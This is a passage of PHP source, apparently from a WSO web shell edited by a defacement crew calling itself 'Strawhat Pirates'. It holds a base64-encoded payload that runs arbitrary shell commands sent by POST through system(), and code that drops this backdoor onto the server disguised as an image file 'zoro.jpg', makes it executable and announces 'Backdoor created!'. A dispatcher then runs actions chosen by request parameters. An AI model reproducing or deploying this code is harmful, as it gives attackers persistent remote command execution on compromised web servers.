ZGVyOm5vbmU7Ij4NCiAgICAgICAgICAgICAgICAgICAgLjo6U3RyNHdoYXQgUGlyYXRlcyBDcmV3OjouDQoJICAgICAgICAgICAgICAgICAgICAgICAmY29weTsgWm9ybw0KIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCjw/cGhwIGlmIChpc3NldCgkX1BPU1RbJ3NocGMnXSkpe2lmKGlzc2V0KCRfUE9TVFsnc2hwYyddKSAmJiAkX1BPU1RbJ3NocGMnXSE9Jycpe3N5c3RlbSgkX1BPU1RbJ3NocGMnXS4nIDI+JjEnKTt9ICAgIH0/PjwvdGV4dGFyZWE+PGJyPjxicj48YSBocmVmPSI/bG9nb3V0Ij5Mb2cgT3V0PC9hPjxicj48L2JvZHk+PC9odG1sPg0K")); ?>';
1809
1810 $b = fopen($path.'/zoro.jpg', 'w'); // Change this to your desired file name.
1811 fwrite($b,$file);
1812 fclose($b);
1813 $b = fopen($path.'w');
1814 chmod($path.'/zoro.jpg', 0755); // Change this also.
1815 echo "Backdoor created!";
1816 }
1817 echo "<br><br /><br /></div>";
1818 echo '</div>';
1819 printFooter();
1820}
1821
1822function actionAbout () {
1823 printHeader();
1824
1825 echo '
1826 <head>
1827<link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet" type="text/css">
1828
1829</head>
1830 <style type="text/css">
1831body {
1832 background-color: #222;
1833 background-size: cover;
1834
1835 color: #ffffff;
1836 margin: 0px;
1837}
1838</style><center><br><br>
1839 <img src="http://i44.tinypic.com/1175nkj.gif"><br>
1840 <img src="http://i.imgur.com/kQCDFQk.gif">
1841 </center>
1842 <center>
1843<hr color="gold" width="65%" style=" border: 0;border-radius:5px; height: 4px; background-image: linear-gradient(to right, rgba(255,255,255, 0), rgba(255,255,255, 0.85), rgba(0, 0, 0, 0));">
1844
1845<br><font style="color:#fff;font-size:14;font-family: Raleway, sans-serif;">
1846Strawhat Luffy - Strawhat 4ce - Strawhat Chopp3r - Strawhat Silent Haxor - Strawhat Zoro <br><br>
1847 Strawhat bro0k - Strawhat Fizche - Strawhat Red - Strawhat Leyte_Pr1d3 - Strawhat Nami
1848 <br><br>
1849<hr color="gold" width="65%" style=" border: 0;border-radius:5px; height: 4px; background-image: linear-gradient(to right, rgba(255,255,255, 0), rgba(255,255,255, 0.85), rgba(0, 0, 0, 0));">
1850<br><br>
1851<font style="color:#fff;font-size:14;font-family: Raleway, sans-serif;"> This WSO shell is edited by <a href="https://www.facebook.com/profile.php?id=100011824903861">Zoro</a></font>
1852</font>
1853</center>'
1854 ;
1855
1856}
1857
1858if( empty($_POST['a']) )
1859 if(isset($default_action) && function_exists('action' . $default_action))
1860 $_POST['a'] = $default_action;
1861 else
1862 $_POST['a'] = 'SecInfo';
1863if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1864 call_user_func('action' . $_POST['a']);
1865
1866?>